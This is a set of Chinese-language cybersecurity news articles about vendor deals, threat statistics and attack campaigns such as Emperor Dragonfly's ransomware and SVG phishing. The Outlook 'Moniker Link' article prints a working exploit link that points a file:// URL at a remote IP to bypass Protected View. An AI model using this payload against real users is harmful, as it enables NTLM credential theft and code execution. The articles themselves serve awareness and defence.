全部文章分享

          本文擷取自資安人

在當今資安威脅日益複雜的環境下，資安產業正面臨重要轉捩點，人工智慧與雲端安全快速發展正在重塑企業防護數位資產的方式。Check Point Software Technologies迎來重要的領導層變動，創辦人Gil Schwed在掌舵超過30年後選擇退位，由曾領導以色列精銳8200單位、後來共同創立資安智庫Team8的Nadav Zafrir接任執行長一職。資安人特別專訪這位具有豐富經驗的新任領導者，探討他對公司的願景、當前面臨的重大挑戰，以及Check Point如何在快速變遷的資安版圖中持續領先。
Q：您在Team8和8200單位的經歷如何塑造您的領導風格？
Zafrir：我投身資安領域已近30年，那時甚至還沒有「網路安全」這個詞。我從多個角度看待這個產業：作為攻擊者、防禦者，也從戰略層面理解國家級基礎設施的需求。在Team8期間，我有機會與超過20家公司密切合作，深入了解威脅如何演變，以及企業如何預測和應對這些威脅。
這些經驗讓我深信，創新必須具備規模化能力，這正是Check Point致力追求的目標：開發大規模、負責任的資安解決方案。在當今高度互連的世界中，複雜性已經達到前所未有的程度，企業、個人和政府都必須在安全性與功能性之間找到平衡點。

Q：作為新任執行長，您首要加強客戶互動並優化市場策略，目前有什麼發現？客戶最關注什麼？
無論規模大小，所有組織都依賴相同的軟體，這使得私部門與政府之間的合作變得至關重要。法規框架應該以結果為導向，設定共同目標，同時讓私部門決定實現這些目標的最佳方法。在Check Point，資安不僅是一種熱情，更是一項使命。我們的Infinity平台旨在成為保護混合網格架構的領先解決方案，它是一個可以無縫整合本地和雲端環境的安全框架。

我們的客戶和合作夥伴認識到AI正在帶來自網際網路誕生以來最重大的轉變之一。他們最關注的是攻擊者與防禦者之間的不對稱性。攻擊者靈活度高，能快速採用新技術，導致新型攻擊方式層出不窮。企業正在應對複雜的網路基礎設施，面臨關鍵抉擇：是採用單一、全方位的資安解決方案，還是整合來自不同供應商的最佳解決方案。

Check Point的Infinity平台通過提供統一、優化的解決方案來解決這個困境。許多客戶感受到分散式安全系統的限制，我們認為以平台為基礎的方法是最佳途徑。

此外，為因應資安威脅的多樣化，我們提出「開放生態系統」策略，積極與產業領導廠商建立合作關係，像是近期與Wiz在雲端安全的策略結盟。面對生成式AI帶來的新興挑戰，這種開放合作的方式更顯重要，讓我們能靈活應對其難以預測的發展趨勢。

然而，有一點始終不變：組織必須理解使用者意圖和角色才能做出明智的資安決策。我們運用AI技術和大型語言模型（LLMs）強化防禦能力，即使面對攻防不對稱的挑戰，也能協助企業更有效地偵測威脅、簡化資安管理流程。
 


Q：Check Point在亞太地區實現最高增長（19%），這與許多優先考慮北美市場的資安公司形成對比。您如何看待亞太市場與其他地區的比較？那裡有什麼最大機遇？
Zafrir：亞太地區是一個龐大且快速擴張的市場。在加速亞太地區業務的同時，我們也在歐非中東和美洲保持強勁發展。

我們的全球布局以三大核心技術為基礎：雲端安全、新世代防火牆以及電子郵件防護，藉此打造完整的混合網路安全架構。以Infinity平台為核心，我們提供全方位的資安防護，完整覆蓋企業的本地環境、邊緣運算到雲端服務。隨著亞太地區加速數位轉型，企業對於這種整合式資安解決方案的需求愈發殷切。

Q：Check Point未來一年的主要增長動力是什麼？您認為政治變化，如美國新政府上台，可能如何影響資安產業？
Zafrir：變化是永恆的，無論是技術、領導風格還是全球地緣政治。這種波動意味著網路威脅將持續演變，要求我們更具創新性和前瞻性。

為強化技術優勢，我們選擇在全球科技重鎮特拉維夫和紐約設立以AI為核心的資安研究中心。這些研究中心不僅致力於預警新型態網路威脅，更要前瞻性的研究資安技術的創新發展。在瞬息萬變的資安領域，具備超前部署的戰略思維，及早因應未知威脅，是維持產業領導地位的關鍵。

Q：隨著網路威脅升級，您如何看待未來五年的資安挑戰，Check Point又將如何應對？
Zafrir：AI為資安領域帶來全新局面。就威脅面而言，攻擊者能以更低成本、更靈活的方式擴大攻擊範圍，加速網路犯罪的演進。但我對防禦技術的發展深具信心。透過AI智慧防禦系統的精準分析和快速應變能力，再加上自動化威脅偵測與回應機制，企業和政府必能重新掌握資安主動權。

以Check Point為例，我們特別關注雲端安全這個AI應用的主戰場。我們採取整合式策略，將先進的防火牆、智慧分段等核心技術，與策略夥伴（如Wiz）的專業優勢相結合。我們不再將雲端與本地環境視為獨立區塊，而是打造一個能因應現代IT架構的統一資安框架，協助企業全面提升防禦能力。

Q：資安市場競爭激烈，既有新創公司也有老牌企業。什麼核心價值讓Check Point與眾不同？
Zafrir：透明、誠信，以及對創新的堅定承諾。我們對當前資安狀況保持坦誠，也清楚了解自己的優勢所在。

我們的創新理念是把它當作生命攸關的事情來做，因為在很多方面，確實如此。但創新必須具備責任感、可擴展性，並且開放協作。歸根結底，客戶至上，為了最好地服務客戶，我們必須與生態系統中的其他供應商合作。我們的目標是提供最全面、最有效的資安解決方案，同時保持對誠信和卓越的堅定承諾。

隨著Check Point加強研究力度並擴大合作夥伴關係，Zafrir明確表示：資安的未來將由適應性、創新力，並以使命為導向的方法來定義，而Check Point將持續致力於保護全球企業和政府的數位資產安全。

         本文擷取自資安人

Sophos 宣布與 Pax8 達成策略合作夥伴關係。透過此次合作，Pax8 網絡內超過 40,000 家託管服務供應商 (MSP) 可獲得全面的資安解決方案組合。Pax8 網絡內的 MSP 現在可透過單一供應商取得業界頂尖的資安解決方案，包括 Sophos Managed Detection and Response (MDR)、由 Intercept X 支援的 Sophos 端點防護以及 Sophos Firewall，打造一站式的資安服務。此舉將為通路合作夥伴帶來變革性優勢，協助簡化營運、整合計費流程，並大幅降低跨客戶的資安管理複雜度。 

根據《Sophos MSP Perspectives 2024》報告，將安全技術整合至單一供應商的 MSP，可將每日安全管理時間減少近一半，若 MSP 原本需管理六家或更多安全供應商，這個數字更可提升至 69%。透過與 Pax8 合作，Sophos 可協助 MSP 移除關鍵的營運障礙，使其能透過單一供應商平台無縫管理資安，簡化解決方案整合並提升營運效率，同時強化整體安全防護，以及簡化雲端採購流程。 

Sophos 執行長 Joe Levy 表示，Sophos 與 Pax8 在使命上高度契合，致力於為 MSP 提供端到端安全服務與產品，同時簡化解決方案的生命週期管理並降低營運負擔。MSP 希望與容易合作的供應商建立夥伴關係，而這項協議將進一步提升 MSP 與 Sophos 的合作便利性，這也是我們始終堅持的承諾。透過與 Pax8 的合作，MSP 能夠更快速取得關鍵的資安工具，幫助他們在日益複雜與動盪的威脅環境中為客戶提供更強大的防護。

Sophos 與 Pax8 攜手合作，為 MSP 帶來的關鍵優勢包括： 

拓展新營收機會：透過 Pax8 Marketplace，MSP 可從單一供應商獲得最全面的安全解決方案組合，提升市場競爭力。 
 
降低營運成本，提升可創造營收的時間：透過 Pax8 Marketplace 的無縫整合，可簡化採購與計費流程，減少管理負擔。 
 
強化 MSP 資源與支援：提供協作式 MSP 賦能計畫、技術支援與銷售培訓，確保合作夥伴能獲得最佳體驗。
 
提供 Microsoft Defender 用戶最完善的 24/7 全天候安全防護：透過 Sophos MDR 服務，確保 MSP 能為 Microsoft 環境的客戶提供相容且全面的安全防護。

Pax8 執行長 Scott Chasin 表示，現今的 MSP 需要與其營運模式相契合的解決方案——以雲端為優先，具備彈性，並且易於大規模管理。Pax8 正在革新 MSP 存取與部署雲端解決方案的方式，而資安則是其中不可或缺的重要環節。透過將 Sophos 的創新資安解決方案引入我們的 Marketplace，Pax8 能為合作夥伴提供企業級資安解決方案，讓他們的中小型企業客戶能夠更輕鬆地管理安全、降低風險，並提升盈利的能力。

Sophos 的解決方案由 Sophos X-Ops 提供即時威脅情報支援，該全球專家團隊由威脅獵人與安全分析師組成，可透過 AI 驅動的主動防護有效抵禦網路攻擊。作為全球領先的託管式偵測與回應 (MDR) 服務供應商，Sophos 為超過 28,000 家企業提供資安防護。Sophos MDR 提供的情報還可進一步強化 MSP 與其客戶的安全性，透過自動化威脅偵測、託管式回應，以及 Sophos 產品組合的深入安全洞察，可協助 MSP 提升防禦能力、降低風險暴露，提供企業級保護同時減少管理複雜度。 

強化 Microsoft 環境安全 
超過 60% 的 Sophos MDR 客戶是經由 MSP 管理，這讓 Sophos 對 MSP 託管環境下的攻擊模式具備獨特且深入的洞察。Sophos 利用這些情報即時更新客戶的防禦機制，以確保 MSP 客戶能夠應對不斷演變的攻擊，為企業與合作夥伴提供更安心的防護。此外，透過 Sophos 的 Microsoft 環境 MDR 服務，Pax8 的 MSP 能夠大幅提升使用 Microsoft Defender 之客戶的安全性，讓客戶在 Microsoft 投資上獲得更高的價值回報。 

透過 Pax8 提供的 Sophos MDR 服務，MSP 可獲得多方面支援。他們可以選擇完全採用 Sophos 的託管服務，或用來強化客戶內部團隊的防護能力，其中涵蓋 夜間與週末等關鍵時段，這些時間往往是攻擊者最常發動攻擊的時機，因此加強防禦至關重要。此外，對於提供內部 MDR 服務的 MSP，Sophos XDR 內建的 AI Asssistant 可利用 Sophos MDR 分析師的第一線情報，協助各種技能層級的安全營運人員更快速地識別與化解威脅。 

Sophos 解決方案將於 2025 年 2 月 28 日 正式登陸 Pax8 Marketplace。

             本文擷取自資安人

賽門鐵克（Symantec）研究人員近期發現，一個與中國有關的進階持續性威脅（APT）組織「Emperor Dragonfly（帝王蜻蜓）」（又稱 Bronze Starlight）首次轉向勒索軟體攻擊，並向一家亞洲軟體服務公司索取 200 萬美元贖金，此舉標誌著中國國家級駭客組織與網路犯罪活動之間出現新的連結。
特殊的攻擊工具組合
根據賽門鐵克的報告，這起發生於 2024 年底的攻擊使用了一組特殊的工具，這些工具此前僅與中國間諜活動有關，特別是與 Mustang Panda 組織相關。攻擊者使用了東芝的合法執行檔 toshdpdb.exe 作為側載工具，連接惡意的動態連結函式庫（DLL）toshdpapi.dll，最終部署包含 PlugX 後門的惡意程式。

研究人員指出，這套工具組並非公開可得，且過去從未與一般網路犯罪活動有關。雖然中國駭客組織經常共享工具，但這些工具通常僅用於間諜活動。

攻擊者首先透過利用 Palo Alto PAN-OS 防火牆軟體的漏洞（CVE-2024-0012）入侵受害者網路。一旦成功入侵，攻擊者開始部署其特製的後門工具組。這個過程始於執行一個看似無害的東芝系統程式 toshdpdb.exe，該程式隨後會載入一個惡意的動態連結函式庫 toshdpapi.dll。這個 DLL 檔案作為載入器，會進一步解密並執行儲存在 TosHdp.dat 檔案中的主要惡意負載。

經過分析，這個惡意負載被確認為 PlugX 後門的變種，具有加密字串、動態 API 解析和控制流程平坦化等特徵。通過這個後門，攻擊者得以在受害者網路中建立持久性存在。

在取得立足點後，攻擊者開始橫向移動，從公司內部網路獲取管理憑證。接著利用這些憑證存取公司的 Veeam 備份伺服器，從中竊取了 Amazon S3 雲端存取憑證。攻擊者利用這些雲端憑證，得以竊取儲存在 S3 儲存桶中的敏感資料。

在完成資料竊取後，攻擊者部署了 RA World 勒索軟體，開始加密受害者的電腦系統。這個階段的攻擊還包括使用名為 NPS 的代理工具，這是一個與 Bronze Starlight 組織過往活動相關的工具。整個攻擊過程顯示出攻擊者具備高度的技術能力，能夠結合傳統的 APT 戰術與勒索軟體攻擊手法。

與過往間諜活動的關聯
賽門鐵克研究人員發現，使用相同工具組的入侵活動在 2024 年 7 月至 2025 年 1 月期間也曾針對多個政府與企業目標。這些目標包括一個東南歐國家的外交部、另一個國家的政府機構，以及多個東南亞地區的政府部門和電信營運商。然而，這些先前的攻擊都是以間諜活動為目的，並未涉及勒索軟體。

相關文章：Sophos揭露《紅宮行動》報告：中國國家支持的駭客組織鎖定東南亞政府機構

研究人員認為，這次勒索軟體攻擊最可能是 APT 組織成員利用其工作工具進行個人牟利。這個推論主要基於受害者的選擇與攻擊者的行為模式。首先，此次受害者並非具有戰略意義的組織，與過往間諜活動目標有明顯差異。其次，攻擊者確實投入時間與受害者溝通討論贖金事宜，這種行為模式與單純用於掩蓋間諜活動的障眼法不符。此外，攻擊者使用了名為 NPS 的代理工具，這與 Bronze Starlight 組織過去部署的不同勒索軟體有關，進一步證實了這一推測。

資安建議
本事件顯示國家級駭客組織與網路犯罪活動之間的界線日益模糊。資安專家建議組織應密切關注並及時修補關鍵系統漏洞，特別是防火牆等安全設備的更新。同時，應強化雲端服務的存取控制與監控機制，確保重要資料的備份，並定期測試復原程序的有效性。此外，組織需要建立完善的事件應變計畫，將具有國家級背景的勒索軟體攻擊納入考量範圍，相應調整防禦策略與應變措施。

         本文擷取自資安人

生成式人工智慧的快速發展，為產業與研究領域的創新帶來無數機會。正如最先進的技術常見的情況，這種演進同樣改變了網路安全威脅的格局，產生出全新的安全需求。關鍵基礎設施的網路安全正在不斷進步，以嚇阻 AI 時代的下一波新興威脅。
 
Armis、Check Point、CrowdStrike、德勤（Deloitte）與 World Wide Technology（WWT）正在整合NVIDIA 網路安全 AI 平台，以協助客戶強化能源、公用事業和製造設施等關鍵基礎設施對抗網路威脅。
 
關鍵基礎設施在高度複雜的環境中運作，常常因數位轉型而加速整合 IT 與 OT，產生出資安漏洞的完美風暴。傳統的網路安全措施已經不足以應對這些新興威脅。
 
利用 NVIDIA 的網路安全 AI 平台，這些合作夥伴能夠為關鍵基礎設施環境提供極佳的可視性，並在維持設施持續運作的同時，實現強大且適應性高的安全功能。

平台整合了 NVIDIA 的加速運算與 AI，採用 NVIDIA BlueField-3 DPU、NVIDIA DOCA 及作為 NVIDIA AI Enterprise 一部分的NVIDIA Morpheus AI 網路安全框架。這個組合能夠實現即時偵測威脅，讓網路安全專業人員能夠在邊緣和整個網路迅速回應。
 
與傳統依賴侵入性方法或軟體代理的解決方案不同，BlueField-3 DPU 有著虛擬安全覆蓋的功能，可以在不中斷運作的情況下檢查網路流量與保護主機完整性。作為嵌入每一台伺服器裡的感測器，它們將遙測資料傳輸至NVIDIA Morpheus，以流暢且不影響運作的方式，實現主機活動、網路流量和應用程式行為的詳細監控。
推動各產業的網路安全創新
整合 Armis Centrix 的 AI 驅動Armis 網路暴露管理平台搭配 NVIDIA 網路安全 AI，協助確保能源、製造、醫療保健與運輸等關鍵基礎設施的安全。
 
CrowdStrike 透過在 BlueField-3 DPU 上部署 CrowdStrike Falcon 安全代理程式，以提升即時 AI 驅動的威脅偵測與回應能力，幫助保護 ICS 與 OT 等關鍵基礎設施的安全。
 
德勤使用 NVIDIA 網路安全 AI 平台推動客戶的數位轉型，以協助滿足突破性技術的需求，這些技術需要為資料中心網路提供即時且精細的可視性，以抵禦日益複雜的威脅。

AI 助力開創更安全的未來
NVIDIA 的網路安全 AI 平台結合生態系合作夥伴的專業知識，提供強大且可擴充的解決方案，保護關鍵基礎設施環境免受不斷演進的威脅。將 NVIDIA AI 與加速運算帶入 的最前線，可協助組織保護現在和未來最重要的事物。

        本文擷取自資安人

Check Point Software Technologies Ltd. 日前於 CPX Vienna 宣佈推出多項 Infinity 平台新功能，加速實現零信任、強化威脅防禦、降低複雜性並簡化安全維運。
 
Check Point Software 首席產品長兼研發主管 Nataly Kremer 表示，由於各種安全解決方案複雜且孤立，安全團隊難以有效防範網路攻擊。Check Point 推出多項 AI 創新功能，旨在降低複雜性並強化 Infinity 平台的統一安全管理功能，為客戶帶來更佳的威脅防禦體驗，並可同時輕鬆搭配使用第三方產品。
 
許多組織仰賴孤立的安全防護方案，IT 團隊在網路、端點、電子郵件和雲端環境中，部署各種針對特定防護需求的安全工具。這種碎片化的安全防護方法需要管理多達數十種系統，帶來維運挑戰、過於分散的策略和安全漏洞風險。同時，網路攻擊次數逐年增長 44%，使安全防護團隊壓力倍增。
 
由於混合環境的獨立性，安全團隊需要跨數十種系統和工具審查並協調策略和流程，這些工作通常以手動方式執行，因此會降低維運速度，也導致零信任架構、威脅排除和基礎建設管理出現漏洞，從而增加網路攻擊和系統故障的風險。Check Point 全新升級的六大 AI 創新功能從以下三方面提升維運速度，並強化威脅防禦能力：
統一身份和策略
藉助 AI 和身份感知技術，管理員能實施更高效與精細的安全防護策略，確保只有授權使用者才能存取關鍵資源。統一跨環境的策略可視化與分析，有助於安全團隊維護安全防禦並確保合規性。
 
Quantum Policy Insights


分析現有策略並提出調整建議，以強化安全防護
透過消除過度寬鬆的存取權限和相互衝突的策略，強化零信任的執行 

Quantum Policy Auditor


確保符合企業安全準則
使用策略可視化介面，快速辨識違反組織準則的策略
在數秒內分析數千條規則，透過將複雜的策略和規則轉化為直觀的圖形化業務洞察，幫助安全和審計團隊節省數周的繁瑣工作 

Infinity Identity


可在整個 Infinity 平台執行集中式身份管理的雲端服務
與第三方身份驗證供應商無縫整合
支援新增新身份來源：Microsoft Defender、Microsoft Intune 與 Harmony Endpoint 


協作式威脅防禦
AI 能幫助組織跨多個執行點即時辨識和攔截威脅，消除人為錯誤並縮短修復時間。
 
Infinity Playblocks


具備跨 Infinity 平台和第三方的安全防護自動化和調度功能
擴展孤島安全解決方案的覆蓋範圍，在整個企業內有效防範安全攻擊
提供超過 100 種開箱即用的 playbook，包括威脅防禦、自動修復與報告等
支援企業使用自然語言生成式 AI（GenAI）輕鬆建立自定義 playbook 


維運簡易性
基於 AI 的洞察能有效減少繁瑣且易出錯的工作，有助於簡化整個安全堆疊的維運，從而強化達成零信任、優化生命周期管理，並縮短基礎建設的停機時間。
 
Infinity AIOps


AI 代理（AI agent）主動監控閘道器，可提前預測並幫助減少故障
即時監控安全防護基礎建設的健康狀況，包括 CPU、記憶體使用率等 

Infinity AI Copilot


基於聊天的 GenAI 助手能了解組織的策略、存取規則、對象、日誌及所有產品的文件紀錄
為安全管理員、IT 部門和安全團隊提供情境化且全面的解決方案，以加速安全管理、減緩威脅和強化回應
有助於在整個 Infinity 平台上快速且有效地實現自動化與協作

          本文擷取自資安人

Sophos X-Ops 發現，網路犯罪分子越來越常利用SVG圖像檔案格式來規避反網路釣魚與垃圾郵件防護機制。SVG 檔案內含類似 XML 的文字指令，可用於繪製圖形。Sophos X-Ops 的研究顯示，從去年年底開始，釣魚集團開始採用這項技術，透過電子郵件傳送附帶惡意 SVG 圖形檔案的附件。

攻擊手法如下： 

網路犯罪分子向目標發送一封帶有 SVG 檔案附件的電子郵件。
當收件者點開附件時，預設會在瀏覽器中開啟。
該 SVG 檔案內含連結或 JavaScript 程式碼，會將瀏覽器重新導向至託管釣魚工具包的網站。 

大多數受害者會看到一個偽造的畫面，誘使他們按下按鈕以開啟或閱讀存放於 DocuSign、Dropbox 或 SharePoint 上的文件，或者收聽透過 Google Voice 接收的語音留言。

Sophos X-Ops 進一步指出，本次研究分析的 SVG 檔案中，近半數僅發送給單一目標，且目標的電子郵件地址或姓名被嵌入在 SVG 檔案內。這種高度客製化的攻擊模式顯示，這些 SVG 檔案正被用於鎖定企業的目標式攻擊。

          本文擷取自資安人

美國網路安全暨基礎設施安全局（CISA）日前發出警告，提醒美國聯邦機構需立即採取行動，防範針對Microsoft Outlook一個嚴重遠端程式碼執行（RCE）漏洞的持續攻擊。

CVE-2024-21413漏洞由Check Point發現，源於Outlook在開啟含有惡意連結的電子郵件時，存在輸入驗證不當的問題。攻擊者可繞過Office檔案的Protected View保護機制（原應將可疑文件限制在唯讀模式），使惡意Office檔案直接在編輯模式下開啟，進而實現遠端程式碼執行。

Check Point將這個漏洞命名為「Moniker Link」，解釋攻擊者可透過在電子郵件中嵌入使用file://協議的惡意連結，並在URL中的檔案副檔名後加入驚嘆號，來繞過Outlook的內建保護機制。

範例如下：
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

受影響的產品包括：

Microsoft Office LTSC 2021
Microsoft 365 Apps for Enterprise
Microsoft Outlook 2016
Microsoft Office 2019

CISA已將此漏洞列入已知被利用漏洞（KEV）目錄，並確認該漏洞正被積極利用中。根據網路安全指令（BOD）22-01，聯邦機構必須在2月27日前完成修補。

資安專家提醒，雖然CISA的警告主要針對美國聯邦機構，但建議私人企業也應優先修補此漏洞，以防止潛在的攻擊。成功利用此漏洞可能導致NTLM憑證遭竊取，以及透過精心製作的Office文件執行任意程式碼。

值得注意的是，Microsoft在修補說明中特別提到，即使僅是在預覽窗格中查看惡意Office文件，也可能觸發攻擊，因此使用者務必及時更新系統。

本文轉載自 bleepingcomputer。

            本文擷取自資安人

Sophos 宣布已完成對 Secureworks 的收購，本次全現金交易對 Secureworks 的估值約為 8.59 億美元。隨著收購完成，Secureworks 的普通股已停止在納斯達克交易。Sophos 的母公司是領先的軟體投資公司 Thoma Bravo。

透過此次收購，Sophos 現已成為專注於託管式偵測與回應 (MDR) 服務的網路安全供應商，為全球超過 28,000 家不同規模的企業提供支援。此次結合將使 Sophos 能夠提供安全營運平台，內建數百種整合功能，以提供自適應防護、偵測與回應，幫助組織降低網路攻擊風險。這套開放且可擴展的平台可幫助企業，特別是擁有複雜 IT 環境的組織，保護當前與未來的技術投資，提升營運效率並提高網路安全支出的投資回報。Sophos X-Ops 也將透過 Secureworks Counter Threat Unit 以及其安全營運與諮詢團隊的加入，進一步擴展其威脅情報與安全服務能力。

Sophos 執行長 Joe Levy 表示，市場正在廣泛採納 MDR 作為實現網路安全成效的明確途徑，這也推動了該領域的快速成長。Sophos 在勒索軟體偵測、惡意軟體分析以及威脅行為者技術手法等方面擁有高度成熟的能力，這使我們在市場上獨具優勢。此外，Sophos 的原生人工智慧 (AI) 進一步強化了這些防禦能力。近十年前，我們的 AI 團隊已率先創新並獲得全球同業認可，如今該技術已深植於 Sophos 的 MDR、端點、安全網路、電子郵件與雲端安全解決方案之中，以更有效地識別並阻止威脅。透過與 Secureworks 整合，我們擴展的服務與產品組合將提供更強大的端對端安全解決方案，涵蓋身分威脅偵測與回應 (ITDR)、新一代 SIEM 以及託管式風險管理，而所有功能均整合於單一開放平台之上。我們還將能夠透過更廣泛且更深入的全球遙測數據，進一步提升 AI、威脅情報與攻擊研究，這些數據均經過分析師調校，以貼近現實世界的攻擊情境。

在短期內，Sophos 和 Secureworks 將維持正常業務運作，並繼續與全球的通路合作夥伴、MSP 及 MSSP 合作，推廣現有的安全服務與技術。兩家公司的銷售與客戶體驗團隊將持續支援現有客戶，協助續約，並發展現有與新的業務機會。Sophos 透過其 MDR、端點安全、網路安全、電子郵件安全及雲端安全解決方案，保護全球超過 60 萬家企業。這些解決方案能夠整合並自適應運作，透過 Sophos Central 平台提供即時防禦。

根據協議條款，Sophos 以全現金交易方式收購 Secureworks，交易估值約為 8.59 億美元。Secureworks 的股東，包括戴爾科技，將獲得每股 8.50 美元的現金收益。此價格相較於 Secureworks 未受影響的 90 天成交量加權平均價格 (VWAP) 溢價 28%。

Kirkland & Ellis LLP 擔任 Sophos 的法律顧問，高盛、巴克萊、美銀證券、滙豐證券以及瑞銀投資銀行擔任財務顧問，並為此次交易提供債務融資。Piper Sandler & Company 與摩根士丹利擔任 Secureworks 的財務顧問，Paul, Weiss, Rifkind, Wharton & Garrison LLP 則擔任其法律顧問。

      本文擷取自資安人

Check Point Software Technologies Ltd. 的威脅情報部門 Check Point Research 數據顯示，2024 年全球平均每周網路攻擊次數為 1,673 次，相較 2023 年增加 44%。其中，台灣的網路攻擊情況尤為嚴重，平均每週遭受 3,993 次攻擊，位居亞太地區之首。
 
根據 Check Point Research 統計 2024 年 8 至 2025 年 1 月間，台灣受攻擊次數最多的前三大產業依序為硬體供應商（平均每周 6,523 次攻擊）、政府與軍事機構（平均每周 5,498 次）和製造業（平均每周 4,609 次）。
 
此外，2024 年第四季全球最常被用於網路釣魚攻擊的前五大品牌分別為微軟（Microsoft）、蘋果（Apple）、谷歌（Google）、領英（LinkedIn）和阿里巴巴（Alibaba）。
2024 年全球網路攻擊數據統計
2024 年全球各組織每週平均遭受 1,673 次網路攻擊，較 2023 年增加44%。


全球各產業遭受攻擊情形：「教育與研究機構」面臨最多的網路攻擊，每週平均遭受 3,574 次攻擊。「政府與軍事機構」排名第二，每週平均 2,286 次攻擊，緊接著是「醫療與保健機構」，每週平均 2,210 次攻擊。
 
全球各地區亮點：非洲是 2024 年度平均遭受最多網路攻擊的地區，每週平均 2,945 次攻擊，較 2023 年增長 55%，其次是亞太地區，每週平均 2,635 次攻擊，年增 37%。其中台灣每週平均遭攻擊次數達 3,993 次，居亞太地區之首，年增率為 31%。
 
勒索軟體持續延燒：2024 年間全球共計超過 5,200 起勒索軟體攻擊案例，較前一年增加 3%。從全球產業分佈來看，工業製造業（22%）是受勒索軟體影響最嚴重的產業，接著依序為醫療與健康產業（10%）及消費品與服務業（9%）。 


威脅情資報告
2024 年 8 月至 2025 年 1 月，台灣受攻擊次數最多的前三大產業依序為硬體供應商（平均每週遭受 6,523 次攻擊）、政府與軍事機構（5,498 次）和製造業（4,609 次）。

威脅情資摘要如下：


台灣最猖獗的惡意軟體為 Remcos。
台灣常見惡意軟體包括遠端控制木馬（RAT）、殭屍網路（FakeUpdates、Mirai）、銀行木馬（Rilide）、下載工具（FakeUpdates）以及竊密軟體（AgentTesla）。
2024 年 8 月至 2025 年 1 月期間，台灣最常見的漏洞利用類型是資訊外洩，影響 75% 組織。 


2024 年第四季品牌網路釣魚報告
2024 年第四季最常被用於釣魚攻擊的品牌排名如下：




排名
品牌
出現率


1
微軟（Microsoft）
32%


2
蘋果（Apple）
12%


3
谷歌（Google）
12%


4
領英（LinkedIn）
11%


5
阿里巴巴（Alibaba）
4%


6
WhatsApp
2%


7
亞馬遜（Amazon）
2%


8
X（前身為 Twitter）
2%


9
臉書（Facebook）
2%


10
Adobe
1%




預先防範網路威脅
知名品牌遭網路釣魚攻擊的事件持續增加，更加凸顯保持警戒的重要性。使用者可以採取以下措施降低風險：


安裝最新的安全軟體
謹慎辨識來路不明通訊中的警示
避免點擊可疑連結或瀏覽不明網站

     本文擷取自資安人

Sophos X-Ops MDR 團隊發現了兩起活躍的威脅行動，分別由不同的威脅攻擊者團體濫用 Microsoft Office 365 平台及 Quick Assist 等遠端管理工具滲透企業的 IT 網路。他們的目的是竊取企業資料並部署勒索軟體。

這兩起攻擊行動都處於高度活躍狀態。Sophos MDR 在過去三個月內觀察到超過 15 起涉及這些手法的事件，其中有一半發生在過去兩週內。  

這兩個威脅團體使用了相似的策略組合： 

鎖定使用 Microsoft Teams 的企業中少數幾位特定員工作為攻擊目標
 
在極短的時間內向這些員工發送成千上萬封垃圾郵件——其中一起案例中在不到一小時內發送了超過 3,000 封郵件 (這種手法被稱為「電郵炸彈」)  
 
透過 Microsoft Teams 的語音和視訊通話進一步聯繫，聲稱要協助解決垃圾郵件問題
 
利用「快速助手」(Quick Assist) 或 Microsoft Teams 的螢幕共享功能控制目標員工的電腦，並部署勒索軟體

​Sophos X-Ops 發現其中一個威脅攻擊者團體牽涉到俄羅斯網路犯罪組織 Fin7，而另一個攻擊團體則與俄羅斯威脅組織 Storm-1811 有關。Sophos 發佈此項研究，目的是協助企業防禦這一波活躍的攻擊行動，並提高對其影響日益增加的認識。

Sophos 首席威脅研究員 Sean Gallagher 表示，雖然濫用遠端管理工具與合法服務不是全新的手法，但我們發現越來越多的威脅團體採用這些策略來攻擊各種規模的企業。Microsoft Teams 預設允許組織外部人員與企業內部員工進行聊天或通話，而攻擊者正是濫用了這一功能。由於許多公司依賴託管服務供應商提供 IT 支援，因此當收到標註為『服務台管理人員』的未知來電時，可能不會警覺到危險，特別是這些通話還跟著大量的垃圾郵件炸彈一起出現。隨著 Sophos 持續觀察到越來越多與這些手段相關的託管式偵測和回應 (MDR) 和事件回應 (IR) 案例，我們希望使用 Microsoft 365 的企業能提高警惕。他們應檢查公司內的設定。若可能，應阻止來自外部帳戶的郵件，並封鎖未被企業定期使用的遠端存取工具與遠端機器管理工具。

             本文擷取自資安人

根據Zivver發布最新的電子郵件安全調查報告顯示，電子郵件安全面臨著嚴峻的挑戰。這份調查訪問美國、英國、荷蘭、法國、德國和比利時等國家的400名IT決策者和2,000名員工，高達93%的員工認為電子郵件對其日常工作「重要」或「非常重要」，其中絕大多數認為是「非常重要」。這凸顯了電子郵件作為現代企業通訊骨幹的關鍵地位。然而，這個不可或缺的工具可能同時也是組織最大的安全弱點。

調查發現，IT領導者在電子郵件安全投資上存在明顯的失衡。近半數的IT領導者將釣魚等入站(inbound emails) 威脅列為首要關注，但僅有不到四成將防止人為錯誤和數據外洩列為投資重點。更值得注意的是，超過三分之二的IT領導者承認出站(outbound emails)安全威脅未獲得應有的重視，且員工的無心之失造成的數據外洩，實際上比惡意社交工程攻擊導致更大的損失。

在出站安全事故方面，調查顯示最常見的問題包括發送錯誤附件、寄錯收件者，以及CC或BCC欄位使用錯誤。這些錯誤往往發生在員工時間緊迫、壓力大或被大量郵件壓得喘不過氣的時候。這反映出現代工作環境中，員工面臨的壓力可能直接影響到資訊安全。

在政策執行與培訓方面，情況同樣不容樂觀。雖然接近四分之三的員工表示了解公司的電子郵件安全政策，但僅約一半的人確實遵守。培訓效果也不盡理想，超過三分之一的大型組織員工認為現有培訓無效或對培訓方式不滿意。調查顯示，員工更偏好實際情境培訓和互動式工作坊，而非傳統的例行公事式培訓。
三大關鍵建議方向
首先，企業應該投資先進的電子郵件安全解決方案。具體來說，實施AI驅動的安全平台，能夠自動識別和防範複雜的釣魚攻擊、魚叉式釣魚，以及零時差威脅。同時，部署即時錯誤預防工具，在郵件發送前就能識別潛在的錯誤，如地址錯誤或附件不當，從源頭預防數據外洩。

其次，加強認證和加密機制至關重要。企業需要升級到如DMARC和DANE等進階安全標準，確保郵件能安全地傳送到正確的伺服器。同時實施零信任加密策略，讓員工能輕鬆地對敏感郵件進行加密，防止資料被截獲或未經授權訪問，確保即使是供應商也無法接觸到敏感信息。

DMARC是一種電子郵件驗證協議，它能幫助組織保護其網域免受未經授權的使用，特別是防止電子郵件詐騙和網域偽冒。而DANE則是一種基於DNS的實體認證機制，通過確保郵件被傳送到正確的伺服器來提升傳輸安全性。

第三，建立全面的數據洩露防護體系。這包括實施自動化的敏感資料分類系統，持續監控出站郵件是否存在潛在的數據外洩風險，必要時可以隔離或阻止有風險的通訊。同時，需要清晰定義並嚴格執行電郵安全政策，確保員工充分理解合規的重要性和處理敏感信息的程序。

